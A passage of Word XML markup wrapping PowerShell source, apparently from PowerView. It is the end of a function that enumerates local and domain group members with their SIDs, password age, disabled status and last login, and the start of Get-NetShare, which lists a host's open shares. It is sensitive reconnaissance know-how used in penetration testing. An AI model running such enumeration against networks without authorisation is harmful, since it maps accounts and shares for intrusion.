    <w:p w14:paraId="630C3233" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $Member | Add-Member Noteproperty 'LastLogin' ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EEC835" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148398DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178BF037" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8B1B9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $Member | Add-Member Noteproperty 'LastLogin' ( $_.GetType().InvokeMember('LastLogin', 'GetProperty', $Null, $_, $Null))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AF2143" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9BEF43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F36DB12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $Member | Add-Member Noteproperty 'LastLogin' ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F1396" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441F375C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9BA467" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Member | Add-Member Noteproperty 'PwdLastSet' ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FEF767" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                $Member | Add-Member Noteproperty 'PwdExpired' ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45663184" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Member | Add-Member Noteproperty 'UserFlags' ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C865B9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49755486" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35388567" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                # repull this user object so we can ensure correct information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54628966" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $LocalUser = $([ADSI] "WinNT://$AdsPath")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633DE4BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="587D534B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                # translate the binary sid to a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF15144" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.objectSid.value,0)).Value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C7828E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Member | Add-Member Noteproperty 'Description' ($LocalUser.Description[0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE86E28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="15D6D604" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                if($IsGroup) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDD16FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $Member | Add-Member Noteproperty 'PwdLastSet' ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C7E94F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $Member | Add-Member Noteproperty 'PwdExpired' ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714E7036" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $Member | Add-Member Noteproperty 'UserFlags' ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6933B2C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $Member | Add-Member Noteproperty 'Disabled' ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5DD973" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $Member | Add-Member Noteproperty 'LastLogin' ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6BFF39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202AFDA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C51E89B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $Member | Add-Member Noteproperty 'PwdLastSet' ( (Get-Date).AddSeconds(-$LocalUser.PasswordAge[0]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D553C3A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $Member | Add-Member Noteproperty 'PwdExpired' ( $LocalUser.PasswordExpired[0] -eq '1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F46692" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $Member | Add-Member Noteproperty 'UserFlags' ( $LocalUser.UserFlags[0] )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200FBF4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    # UAC flags of 0x2 mean the account is disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172A41F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $Member | Add-Member Noteproperty 'Disabled' $(($LocalUser.userFlags.value -band 2) -eq 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B317087" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B6D60A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $Member | Add-Member Noteproperty 'LastLogin' ( $LocalUser.LastLogin[0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3E2628" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4AB549" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F196299" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                        $Member | Add-Member Noteproperty 'LastLogin' ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE86072" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC8DF97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31366618" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF77014" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Member.PSObject.TypeNames.Add('PowerView.LocalUser')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45935C13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41401035" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="51BA89C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # if the result is a group domain object and we're recursing,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C44B743" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            #   try to resolve all the group member results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73377DF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if($Recurse -and $IsGroup) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E8A461" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                if($IsDomain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F6FEDF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                  $FQDN = $Name.split("/")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C7E7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                  $GroupName = $Name.split("/")[1].trim()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD5434" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5D844414" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                  Get-NetGroupMember -GroupName $GroupName -Domain $FQDN -FullData -Recurse | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36349067" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="199490CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $Member = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73837942" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $Member | Add-Member Noteproperty 'ComputerName' "$FQDN/$($_.GroupName)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CFDE0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="628662FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $MemberDN = $_.distinguishedName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588FEAE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      # extract the FQDN from the Distinguished Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2432C6AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFCCE3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F80C982" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $MemberIsGroup = @('268435456','268435457','536870912','536870913') -contains $_.samaccounttype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF67C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4BFD182E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      if ($_.samAccountName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47958336" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                          # forest users have the samAccountName set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD79B0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                          $MemberName = $_.samAccountName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6363A21A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004EA6A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645B002B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                          try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12226CBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                              # external trust users have a SID, so convert it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB21481" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                              try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C97925" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                                  $MemberName = Convert-SidToName $_.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233969F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                              }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA212CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                              catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B80A8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                                  # if there's a problem contacting the domain to resolve the SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F79B989" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                                  $MemberName = $_.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCF8F58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                              }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BADCE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                          }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB8D9F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                          catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718EA8FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                              Write-Debug "Error resolving SID : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F56D58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                          }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A707972" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EFF842" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C13E0C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $Member | Add-Member Noteproperty 'AccountName' "$MemberDomain/$MemberName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A231B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $Member | Add-Member Noteproperty 'SID' $_.objectsid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165A1F03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $Member | Add-Member Noteproperty 'Description' $_.description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A646E4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $Member | Add-Member Noteproperty 'Disabled' $False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E7C934" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $Member | Add-Member Noteproperty 'IsGroup' $MemberIsGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1E8BD5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $Member | Add-Member Noteproperty 'IsDomain' $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE75034" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $Member | Add-Member Noteproperty 'LastLogin' ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FCD566" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                      $Member | Add-Member Noteproperty 'PwdLastSet' $_.pwdLastSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C93834B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $Member | Add-Member Noteproperty 'PwdExpired' ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7220BAE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $Member | Add-Member Noteproperty 'UserFlags' $_.userAccountControl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAEDDB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $Member.PSObject.TypeNames.Add('PowerView.LocalUser')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7BF545" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                      $Member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7D186E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331F0EED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                              } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498C6134" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                Get-NetLocalGroup -ComputerName $Server -GroupName $ObjName -Recurse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2979F031" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                              }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46005BA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C8AC99" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B923363" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CA3396" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4229B412" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EDE151" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Warning "[!] Error: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E9C4E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5733C202" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A6BCBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A37BB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CE32C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557E326A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6560E299" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-NetShare {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E1FC78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089F6F39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677A9933" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="65541BE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function will execute the NetShareEnum Win32API call to query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BF8013" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        a given host for open shares. This is a replacement for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA14F36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        "net share \\hostname"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5668C38D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C22D882" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD8B65D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27D8DE09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The hostname to query for shares. Also accepts IP addresses.</w:t>
